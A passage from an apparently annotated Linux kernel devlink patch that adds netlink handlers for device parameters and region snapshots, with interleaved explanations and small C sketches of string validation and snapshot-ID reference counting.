++	return 0;
++}
++
++static struct devlink_param_item *
++devlink_param_find_by_name(struct list_head *param_list,
++			   const char *param_name)
++{
++	struct devlink_param_item *param_item;
++
++	list_for_each_entry(param_item, param_list, list)
++		if (!strcmp(param_item->param->name, param_name))
++			return param_item;
++	return NULL;
++}
++
++static struct devlink_param_item *
++devlink_param_find_by_id(struct list_head *param_list, u32 param_id)
++{
++	struct devlink_param_item *param_item;
++
++	list_for_each_entry(param_item, param_list, list)
++		if (param_item->param->id == param_id)
++			return param_item;
++	return NULL;
++}
++
++static bool
++devlink_param_cmode_is_supported(const struct devlink_param *param,
++				 enum devlink_param_cmode cmode)
++{
++	return test_bit(cmode, &param->supported_cmodes);
++}
++
++static int devlink_param_get(struct devlink *devlink,
++			     const struct devlink_param *param,
++			     struct devlink_param_gset_ctx *ctx)
++{
++	if (!param->get || devlink->reload_failed)
++		return -EOPNOTSUPP;
++	return param->get(devlink, param->id, ctx);
++}
++
++static int devlink_param_set(struct devlink *devlink,
++			     const struct devlink_param *param,
++			     struct devlink_param_gset_ctx *ctx)
++{
++	if (!param->set || devlink->reload_failed)
++		return -EOPNOTSUPP;
++	return param->set(devlink, param->id, ctx);
++}
++
++static int
++devlink_param_type_to_nla_type(enum devlink_param_type param_type)
++{
++	switch (param_type) {
++	case DEVLINK_PARAM_TYPE_U8:
++		return NLA_U8;
++	case DEVLINK_PARAM_TYPE_U16:
++		return NLA_U16;
++	case DEVLINK_PARAM_TYPE_U32:
++		return NLA_U32;
++	case DEVLINK_PARAM_TYPE_STRING:
++		return NLA_STRING;
++	case DEVLINK_PARAM_TYPE_BOOL:
++		return NLA_FLAG;
++	default:
++		return -EINVAL;
++	}
++}
++
++static int
++devlink_nl_param_value_fill_one(struct sk_buff *msg,
++				enum devlink_param_type type,
++				enum devlink_param_cmode cmode,
++				union devlink_param_value val)
++{
++	struct nlattr *param_value_attr;
++
++	param_value_attr = nla_nest_start_noflag(msg,
++						 DEVLINK_ATTR_PARAM_VALUE);
++	if (!param_value_attr)
++		goto nla_put_failure;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_CMODE, cmode))
++		goto value_nest_cancel;
++
++	switch (type) {
++	case DEVLINK_PARAM_TYPE_U8:
++		if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu8))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_U16:
++		if (nla_put_u16(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu16))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_U32:
++		if (nla_put_u32(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu32))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_STRING:
++		if (nla_put_string(msg, DEVLINK_ATTR_PARAM_VALUE_DATA,
++				   val.vstr))
++			goto value_nest_cancel;
++		break;
++	case DEVLINK_PARAM_TYPE_BOOL:
++		if (val.vbool &&
++		    nla_put_flag(msg, DEVLINK_ATTR_PARAM_VALUE_DATA))
++			goto value_nest_cancel;
++		break;
++	}
++
++	nla_nest_end(msg, param_value_attr);
++	return 0;
++
++value_nest_cancel:
++	nla_nest_cancel(msg, param_value_attr);
++nla_put_failure:
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_param_fill(struct sk_buff *msg, struct devlink *devlink,
++				 unsigned int port_index,
++				 struct devlink_param_item *param_item,
++				 enum devlink_command cmd,
++				 u32 portid, u32 seq, int flags)
++{
++	union devlink_param_value param_value[DEVLINK_PARAM_CMODE_MAX + 1];
++	bool param_value_set[DEVLINK_PARAM_CMODE_MAX + 1] = {};
++	const struct devlink_param *param = param_item->param;
++	struct devlink_param_gset_ctx ctx;
++	struct nlattr *param_values_list;
++	struct nlattr *param_attr;
++	int nla_type;
++	void *hdr;
++	int err;
++	int i;
++
++	/* Gather the value for each supported configuration mode; the
++	 * driverinit value comes from the copy cached on the param item.
++	 */
++	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
++		if (!devlink_param_cmode_is_supported(param, i))
++			continue;
++		if (i == DEVLINK_PARAM_CMODE_DRIVERINIT) {
++			if (!param_item->driverinit_value_valid)
++				return -EOPNOTSUPP;
++			param_value[i] = param_item->driverinit_value;
++		} else {
++			ctx.cmode = i;
++			err = devlink_param_get(devlink, param, &ctx);
++			if (err)
++				return err;
++			param_value[i] = ctx.val;
++		}
++		param_value_set[i] = true;
++	}
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto genlmsg_cancel;
++
++	if (cmd == DEVLINK_CMD_PORT_PARAM_GET ||
++	    cmd == DEVLINK_CMD_PORT_PARAM_NEW ||
++	    cmd == DEVLINK_CMD_PORT_PARAM_DEL)
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, port_index))
++			goto genlmsg_cancel;
++
++	param_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PARAM);
++	if (!param_attr)
++		goto genlmsg_cancel;
++	if (nla_put_string(msg, DEVLINK_ATTR_PARAM_NAME, param->name))
++		goto param_nest_cancel;
++	if (param->generic && nla_put_flag(msg, DEVLINK_ATTR_PARAM_GENERIC))
++		goto param_nest_cancel;
++
++	nla_type = devlink_param_type_to_nla_type(param->type);
++	if (nla_type < 0)
++		goto param_nest_cancel;
++	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_TYPE, nla_type))
++		goto param_nest_cancel;
++
++	param_values_list = nla_nest_start_noflag(msg,
++						  DEVLINK_ATTR_PARAM_VALUES_LIST);
++	if (!param_values_list)
++		goto param_nest_cancel;
++
++	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
++		if (!param_value_set[i])
++			continue;
++		err = devlink_nl_param_value_fill_one(msg, param->type,
++						      i, param_value[i]);
++		if (err)
++			goto values_list_nest_cancel;
++	}
++
++	nla_nest_end(msg, param_values_list);
++	nla_nest_end(msg, param_attr);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++values_list_nest_cancel:
++	nla_nest_end(msg, param_values_list);
++param_nest_cancel:
++	nla_nest_cancel(msg, param_attr);
++genlmsg_cancel:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_param_notify(struct devlink *devlink,
++				 unsigned int port_index,
++				 struct devlink_param_item *param_item,
++				 enum devlink_command cmd)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_PARAM_NEW && cmd != DEVLINK_CMD_PARAM_DEL &&
++		cmd != DEVLINK_CMD_PORT_PARAM_NEW &&
++		cmd != DEVLINK_CMD_PORT_PARAM_DEL);
++	ASSERT_DEVLINK_REGISTERED(devlink);
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++	err = devlink_nl_param_fill(msg, devlink, port_index, param_item, cmd,
++				    0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++static int devlink_nl_cmd_param_get_dumpit(struct sk_buff *msg,
++					   struct netlink_callback *cb)
++{
++	struct devlink_param_item *param_item;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(param_item, &devlink->param_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_param_fill(msg, devlink, 0, param_item,
++						    DEVLINK_CMD_PARAM_GET,
++						    NETLINK_CB(cb->skb).portid,
++						    cb->nlh->nlmsg_seq,
++						    NLM_F_MULTI);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++devlink_param_type_get_from_info(struct genl_info *info,
++				 enum devlink_param_type *param_type)
++{
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_TYPE))
++		return -EINVAL;
++
++	switch (nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_TYPE])) {
++	case NLA_U8:
++		*param_type = DEVLINK_PARAM_TYPE_U8;
++		break;
++	case NLA_U16:
++		*param_type = DEVLINK_PARAM_TYPE_U16;
++		break;
++	case NLA_U32:
++		*param_type = DEVLINK_PARAM_TYPE_U32;
++		break;
++	case NLA_STRING:
++		*param_type = DEVLINK_PARAM_TYPE_STRING;
++		break;
++	case NLA_FLAG:
++		*param_type = DEVLINK_PARAM_TYPE_BOOL;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int
++devlink_param_value_get_from_info(const struct devlink_param *param,
++				  struct genl_info *info,
++				  union devlink_param_value *value)
++{
++	struct nlattr *param_data;
++	int len;
++
++	param_data = info->attrs[DEVLINK_ATTR_PARAM_VALUE_DATA];
++
++	if (param->type != DEVLINK_PARAM_TYPE_BOOL && !param_data)
++		return -EINVAL;
++
++	switch (param->type) {
++	case DEVLINK_PARAM_TYPE_U8:
++		if (nla_len(param_data) != sizeof(u8))
++			return -EINVAL;
++		value->vu8 = nla_get_u8(param_data);
++		break;
++	case DEVLINK_PARAM_TYPE_U16:
++		if (nla_len(param_data) != sizeof(u16))
++			return -EINVAL;
++		value->vu16 = nla_get_u16(param_data);
++		break;
++	case DEVLINK_PARAM_TYPE_U32:
++		if (nla_len(param_data) != sizeof(u32))
++			return -EINVAL;
++		value->vu32 = nla_get_u32(param_data);
++		break;
++	case DEVLINK_PARAM_TYPE_STRING:
++		len = strnlen(nla_data(param_data), nla_len(param_data));
++		if (len == nla_len(param_data) ||
++		    len >= __DEVLINK_PARAM_MAX_STRING_VALUE)
++			return -EINVAL;
++		strcpy(value->vstr, nla_data(param_data));
++		break;
++	case DEVLINK_PARAM_TYPE_BOOL:
++		if (param_data && nla_len(param_data))
++			return -EINVAL;
++		value->vbool = nla_get_flag(param_data);
++		break;
++	}
++	return 0;
++}
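
The string case above accepts the payload only if a terminating NUL
appears inside the attribute and the string fits the destination
buffer. A standalone sketch of that validation, with an illustrative
size limit standing in for __DEVLINK_PARAM_MAX_STRING_VALUE:

#include <stdio.h>
#include <string.h>

#define MAX_STRING_VALUE 32	/* stand-in for __DEVLINK_PARAM_MAX_STRING_VALUE */

static int copy_param_string(char *dst, const char *payload, size_t payload_len)
{
	size_t len = strnlen(payload, payload_len);

	if (len == payload_len || len >= MAX_STRING_VALUE)
		return -1;	/* unterminated or too long */
	strcpy(dst, payload);
	return 0;
}

int main(void)
{
	char buf[MAX_STRING_VALUE];

	printf("%d\n", copy_param_string(buf, "hello\0", 6));	/* 0: NUL inside payload */
	printf("%d\n", copy_param_string(buf, "hello", 5));	/* -1: no NUL inside payload */
	return 0;
}
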
++
++static struct devlink_param_item *
++devlink_param_get_from_info(struct list_head *param_list,
++			    struct genl_info *info)
++{
++	char *param_name;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_NAME))
++		return NULL;
++
++	param_name = nla_data(info->attrs[DEVLINK_ATTR_PARAM_NAME]);
++	return devlink_param_find_by_name(param_list, param_name);
++}
++
++static int devlink_nl_cmd_param_get_doit(struct sk_buff *skb,
++					 struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_param_item *param_item;
++	struct sk_buff *msg;
++	int err;
++
++	param_item = devlink_param_get_from_info(&devlink->param_list, info);
++	if (!param_item)
++		return -EINVAL;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_param_fill(msg, devlink, 0, param_item,
++				    DEVLINK_CMD_PARAM_GET,
++				    info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __devlink_nl_cmd_param_set_doit(struct devlink *devlink,
++					   unsigned int port_index,
++					   struct list_head *param_list,
++					   struct genl_info *info,
++					   enum devlink_command cmd)
++{
++	enum devlink_param_type param_type;
++	struct devlink_param_gset_ctx ctx;
++	enum devlink_param_cmode cmode;
++	struct devlink_param_item *param_item;
++	const struct devlink_param *param;
++	union devlink_param_value value;
++	int err = 0;
++
++	param_item = devlink_param_get_from_info(param_list, info);
++	if (!param_item)
++		return -EINVAL;
++	param = param_item->param;
++	err = devlink_param_type_get_from_info(info, &param_type);
++	if (err)
++		return err;
++	if (param_type != param->type)
++		return -EINVAL;
++	err = devlink_param_value_get_from_info(param, info, &value);
++	if (err)
++		return err;
++	if (param->validate) {
++		err = param->validate(devlink, param->id, value, info->extack);
++		if (err)
++			return err;
++	}
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_VALUE_CMODE))
++		return -EINVAL;
++	cmode = nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_VALUE_CMODE]);
++	if (!devlink_param_cmode_is_supported(param, cmode))
++		return -EOPNOTSUPP;
++
++	if (cmode == DEVLINK_PARAM_CMODE_DRIVERINIT) {
++		if (param->type == DEVLINK_PARAM_TYPE_STRING)
++			strcpy(param_item->driverinit_value.vstr, value.vstr);
++		else
++			param_item->driverinit_value = value;
++		param_item->driverinit_value_valid = true;
++	} else {
++		if (!param->set)
++			return -EOPNOTSUPP;
++		ctx.val = value;
++		ctx.cmode = cmode;
++		err = devlink_param_set(devlink, param, &ctx);
++		if (err)
++			return err;
++	}
++
++	devlink_param_notify(devlink, port_index, param_item, cmd);
++	return 0;
++}
++
++static int devlink_nl_cmd_param_set_doit(struct sk_buff *skb,
++					 struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++
++	return __devlink_nl_cmd_param_set_doit(devlink, 0, &devlink->param_list,
++					       info, DEVLINK_CMD_PARAM_NEW);
++}
++
++static int devlink_nl_cmd_port_param_get_dumpit(struct sk_buff *msg,
++						struct netlink_callback *cb)
++{
++	NL_SET_ERR_MSG_MOD(cb->extack, "Port params are not supported");
++	return msg->len;
++}
++
++static int devlink_nl_cmd_port_param_get_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
++	return -EINVAL;
++}
++
++static int devlink_nl_cmd_port_param_set_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
++	return -EINVAL;
++}
++
++static int devlink_nl_region_snapshot_id_put(struct sk_buff *msg,
++					     struct devlink *devlink,
++					     struct devlink_snapshot *snapshot)
++{
++	struct nlattr *snap_attr;
++	int err;
++
++	snap_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_SNAPSHOT);
++	if (!snap_attr)
++		return -EINVAL;
++
++	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID, snapshot->id);
++	if (err)
++		goto nla_put_failure;
++
++	nla_nest_end(msg, snap_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, snap_attr);
++	return err;
++}
++
++static int devlink_nl_region_snapshots_id_put(struct sk_buff *msg,
++					      struct devlink *devlink,
++					      struct devlink_region *region)
++{
++	struct devlink_snapshot *snapshot;
++	struct nlattr *snapshots_attr;
++	int err;
++
++	snapshots_attr = nla_nest_start_noflag(msg,
++					       DEVLINK_ATTR_REGION_SNAPSHOTS);
++	if (!snapshots_attr)
++		return -EINVAL;
++
++	list_for_each_entry(snapshot, &region->snapshot_list, list) {
++		err = devlink_nl_region_snapshot_id_put(msg, devlink, snapshot);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	nla_nest_end(msg, snapshots_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, snapshots_attr);
++	return err;
++}
++
++static int devlink_nl_region_fill(struct sk_buff *msg, struct devlink *devlink,
++				  enum devlink_command cmd, u32 portid,
++				  u32 seq, int flags,
++				  struct devlink_region *region)
++{
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = devlink_nl_put_handle(msg, devlink);
++	if (err)
++		goto nla_put_failure;
++
++	if (region->port) {
++		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
++				  region->port->index);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME, region->ops->name);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
++				region->size,
++				DEVLINK_ATTR_PAD);
++	if (err)
++		goto nla_put_failure;
++
++	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_MAX_SNAPSHOTS,
++			  region->max_snapshots);
++	if (err)
++		goto nla_put_failure;
++
++	err = devlink_nl_region_snapshots_id_put(msg, devlink, region);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static struct sk_buff *
++devlink_nl_region_notify_build(struct devlink_region *region,
++			       struct devlink_snapshot *snapshot,
++			       enum devlink_command cmd, u32 portid, u32 seq)
++{
++	struct devlink *devlink = region->devlink;
++	struct sk_buff *msg;
++	void *hdr;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return ERR_PTR(-ENOMEM);
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, 0, cmd);
++	if (!hdr) {
++		err = -EMSGSIZE;
++		goto out_free_msg;
++	}
++
++	err = devlink_nl_put_handle(msg, devlink);
++	if (err)
++		goto out_cancel_msg;
++
++	if (region->port) {
++		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
++				  region->port->index);
++		if (err)
++			goto out_cancel_msg;
++	}
++
++	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME,
++			     region->ops->name);
++	if (err)
++		goto out_cancel_msg;
++
++	if (snapshot) {
++		err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID,
++				  snapshot->id);
++		if (err)
++			goto out_cancel_msg;
++	} else {
++		err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
++					region->size, DEVLINK_ATTR_PAD);
++		if (err)
++			goto out_cancel_msg;
++	}
++	genlmsg_end(msg, hdr);
++
++	return msg;
++
++out_cancel_msg:
++	genlmsg_cancel(msg, hdr);
++out_free_msg:
++	nlmsg_free(msg);
++	return ERR_PTR(err);
++}
++
++static void devlink_nl_region_notify(struct devlink_region *region,
++				     struct devlink_snapshot *snapshot,
++				     enum devlink_command cmd)
++{
++	struct devlink *devlink = region->devlink;
++	struct sk_buff *msg;
++
++	WARN_ON(cmd != DEVLINK_CMD_REGION_NEW && cmd != DEVLINK_CMD_REGION_DEL);
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = devlink_nl_region_notify_build(region, snapshot, cmd, 0, 0);
++	if (IS_ERR(msg))
++		return;
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++/**
++ * __devlink_snapshot_id_increment - Increment number of snapshots using an id
++ *	@devlink: devlink instance
++ *	@id: the snapshot id
++ *
++ *	Track when a new snapshot begins using an id. Load the count for the
++ *	given id from the snapshot xarray, increment it, and store it back.
++ *
++ *	Called when a new snapshot is created with the given id.
++ *
++ *	The id *must* have been previously allocated by
++ *	devlink_region_snapshot_id_get().
++ *
++ *	Returns 0 on success, or an error on failure.
++ */
++static int __devlink_snapshot_id_increment(struct devlink *devlink, u32 id)
++{
++	unsigned long count;
++	void *p;
++	int err;
++
++	xa_lock(&devlink->snapshot_ids);
++	p = xa_load(&devlink->snapshot_ids, id);
++	if (WARN_ON(!p)) {
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	if (WARN_ON(!xa_is_value(p))) {
++		err = -EINVAL;
++		goto unlock;
++	}
++
++	count = xa_to_value(p);
++	count++;
++
++	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
++				GFP_ATOMIC));
++unlock:
++	xa_unlock(&devlink->snapshot_ids);
++	return err;
++}
++
++/**
++ * __devlink_snapshot_id_decrement - Decrease number of snapshots using an id
++ *	@devlink: devlink instance
++ *	@id: the snapshot id
++ *
++ *	Track when a snapshot is deleted and stops using an id. Load the count
++ *	for the given id from the snapshot xarray, decrement it, and store it
++ *	back.
++ *
++ *	If the count reaches zero, erase this id from the xarray, freeing it
++ *	up for future re-use by devlink_region_snapshot_id_get().
++ *
++ *	Called when a snapshot using the given id is deleted, and when the
++ *	initial allocator of the id is finished using it.
++ */
++static void __devlink_snapshot_id_decrement(struct devlink *devlink, u32 id)
++{
++	unsigned long count;
++	void *p;
++
++	xa_lock(&devlink->snapshot_ids);
++	p = xa_load(&devlink->snapshot_ids, id);
++	if (WARN_ON(!p))
++		goto unlock;
++
++	if (WARN_ON(!xa_is_value(p)))
++		goto unlock;
++
++	count = xa_to_value(p);
++
++	if (count > 1) {
++		count--;
++		__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
++			   GFP_ATOMIC);
++	} else {
++		/* If this was the last user, we can erase this id */
++		__xa_erase(&devlink->snapshot_ids, id);
++	}
++unlock:
++	xa_unlock(&devlink->snapshot_ids);
++}
++
++/**
++ *	__devlink_snapshot_id_insert - Insert a specific snapshot ID
++ *	@devlink: devlink instance
++ *	@id: the snapshot id
++ *
++ *	Mark the given snapshot id as used by inserting a zero value into the
++ *	snapshot xarray.
++ *
++ *	This must be called while holding the devlink instance lock. Unlike
++ *	devlink_snapshot_id_get, the initial reference count is zero, not one.
++ *	It is expected that the id will immediately be used before
++ *	releasing the devlink instance lock.
++ *
++ *	Returns zero on success, or an error code if the snapshot id could not
++ *	be inserted.
++ */
++static int __devlink_snapshot_id_insert(struct devlink *devlink, u32 id)
++{
++	int err;
++
++	xa_lock(&devlink->snapshot_ids);
++	if (xa_load(&devlink->snapshot_ids, id)) {
++		xa_unlock(&devlink->snapshot_ids);
++		return -EEXIST;
++	}
++	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(0),
++				GFP_ATOMIC));
++	xa_unlock(&devlink->snapshot_ids);
++	return err;
++}
++
++/**
++ *	__devlink_region_snapshot_id_get - get snapshot ID
++ *	@devlink: devlink instance
++ *	@id: storage to return snapshot id
++ *
++ *	Allocates a new snapshot id. Returns zero on success, or a negative
++ *	error on failure. Must be called while holding the devlink instance
++ *	lock.
++ *
++ *	Snapshot IDs are tracked using an xarray which stores the number of
++ *	users of the snapshot id.
++ *
++ *	Note that the caller of this function counts as a 'user', in order to
++ *	avoid race conditions. The caller must release its hold on the
++ *	snapshot by using devlink_region_snapshot_id_put.
++ */
++static int __devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
++{
++	return xa_alloc(&devlink->snapshot_ids, id, xa_mk_value(1),
++			xa_limit_32b, GFP_KERNEL);
++}
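
Taken together, the helpers above implement a small reference count per
snapshot id, stored directly in the xarray as a tagged integer
(xa_mk_value()). A userspace analog of the lifecycle, using a plain
table in place of the xarray:

#include <stdio.h>

#define MAX_IDS 8
static long refcount[MAX_IDS];	/* 0 means the id is unused */

static int id_get(unsigned int *id)	/* __devlink_region_snapshot_id_get */
{
	for (unsigned int i = 0; i < MAX_IDS; i++) {
		if (!refcount[i]) {
			refcount[i] = 1;	/* allocator holds one ref */
			*id = i;
			return 0;
		}
	}
	return -1;
}

static void id_decrement(unsigned int id)	/* __devlink_snapshot_id_decrement */
{
	if (--refcount[id] == 0)
		printf("id %u released for reuse\n", id);
}

int main(void)
{
	unsigned int id;

	if (id_get(&id))
		return 1;
	refcount[id]++;		/* snapshot created: __devlink_snapshot_id_increment */
	id_decrement(id);	/* allocator drops its reference */
	id_decrement(id);	/* snapshot deleted: id is free again */
	return 0;
}
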
++
++/**
++ *	__devlink_region_snapshot_create - create a new snapshot
++ *	@region: devlink region of the snapshot
++ *	@data: snapshot data
++ *	@snapshot_id: snapshot id to be created
++ *
++ *	This will add a new snapshot of a region. The snapshot
++ *	will be stored on the region struct and can be accessed
++ *	from devlink. This is useful for future analyses of snapshots.
++ *	Multiple snapshots can be created on a region.
++ *	The @snapshot_id should be obtained using the getter function.
++ *
++ *	Must be called only while holding the region snapshot lock.
++ */
++static int
++__devlink_region_snapshot_create(struct devlink_region *region,
++				 u8 *data, u32 snapshot_id)
++{
++	struct devlink *devlink = region->devlink;
++	struct devlink_snapshot *snapshot;
++	int err;
++
++	lockdep_assert_held(&region->snapshot_lock);
++
++	/* check if region can hold one more snapshot */
++	if (region->cur_snapshots == region->max_snapshots)
++		return -ENOSPC;
++
++	if (devlink_region_snapshot_get_by_id(region, snapshot_id))
++		return -EEXIST;
++
++	snapshot = kzalloc(sizeof(*snapshot), GFP_KERNEL);
++	if (!snapshot)
++		return -ENOMEM;
++
++	err = __devlink_snapshot_id_increment(devlink, snapshot_id);
++	if (err)
++		goto err_snapshot_id_increment;
++
++	snapshot->id = snapshot_id;
++	snapshot->region = region;
++	snapshot->data = data;
++
++	list_add_tail(&snapshot->list, &region->snapshot_list);
++
++	region->cur_snapshots++;
++
++	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_NEW);
++	return 0;
++
++err_snapshot_id_increment:
++	kfree(snapshot);
++	return err;
++}
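
A hypothetical driver-side capture flow built on the public wrappers of
the helpers above (devlink_region_snapshot_id_get(),
devlink_region_snapshot_create() and devlink_region_snapshot_id_put()
are the exported devlink APIs; the region and the captured data here
are placeholders):

static int example_capture(struct devlink *devlink,
			   struct devlink_region *region)
{
	u8 *data;
	u32 id;
	int err;

	err = devlink_region_snapshot_id_get(devlink, &id);	/* count = 1 */
	if (err)
		return err;

	data = kzalloc(64, GFP_KERNEL);	/* stand-in for real device state */
	if (!data) {
		err = -ENOMEM;
		goto out;
	}

	/* On success the region takes ownership of @data; count = 2. */
	err = devlink_region_snapshot_create(region, data, id);
	if (err)
		kfree(data);
out:
	devlink_region_snapshot_id_put(devlink, id);	/* drop our reference */
	return err;
}
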
++
++static void devlink_region_snapshot_del(struct devlink_region *region,
++					struct devlink_snapshot *snapshot)
++{
++	struct devlink *devlink = region->devlink;
++
++	lockdep_assert_held(&region->snapshot_lock);
++
++	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_DEL);
++	region->cur_snapshots--;
++	list_del(&snapshot->list);
++	region->ops->destructor(snapshot->data);
++	__devlink_snapshot_id_decrement(devlink, snapshot->id);
++	kfree(snapshot);
++}
++
++static int devlink_nl_cmd_region_get_doit(struct sk_buff *skb,
++					  struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_port *port = NULL;
++	struct devlink_region *region;
++	const char *region_name;
++	struct sk_buff *msg;
++	unsigned int index;
++	int err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME))
++		return -EINVAL;
++
++	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
++
++		port = devlink_port_get_by_index(devlink, index);
++		if (!port)
++			return -ENODEV;
++	}
++
++	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
++	if (port)
++		region = devlink_port_region_get_by_name(port, region_name);
++	else
++		region = devlink_region_get_by_name(devlink, region_name);
++
++	if (!region)
++		return -EINVAL;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_region_fill(msg, devlink, DEVLINK_CMD_REGION_GET,
++				     info->snd_portid, info->snd_seq, 0,
++				     region);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_region_get_port_dumpit(struct sk_buff *msg,
++						 struct netlink_callback *cb,
++						 struct devlink_port *port,
++						 int *idx,
++						 int start)
++{
++	struct devlink_region *region;
++	int err = 0;
++
++	list_for_each_entry(region, &port->region_list, list) {
++		if (*idx < start) {
++			(*idx)++;
++			continue;
++		}
++		err = devlink_nl_region_fill(msg, port->devlink,
++					     DEVLINK_CMD_REGION_GET,
++					     NETLINK_CB(cb->skb).portid,
++					     cb->nlh->nlmsg_seq,
++					     NLM_F_MULTI, region);
++		if (err)
++			goto out;
++		(*idx)++;
++	}
++
++out:
++	return err;
++}
++
++static int devlink_nl_cmd_region_get_devlink_dumpit(struct sk_buff *msg,
++						    struct netlink_callback *cb,
++						    struct devlink *devlink,
++						    int *idx,
++						    int start)
++{
++	struct devlink_region *region;
++	struct devlink_port *port;
++	int err = 0;
++
++	devl_lock(devlink);
++	list_for_each_entry(region, &devlink->region_list, list) {
++		if (*idx < start) {
++			(*idx)++;
++			continue;
++		}
++		err = devlink_nl_region_fill(msg, devlink,
++					     DEVLINK_CMD_REGION_GET,
++					     NETLINK_CB(cb->skb).portid,
++					     cb->nlh->nlmsg_seq,
++					     NLM_F_MULTI, region);
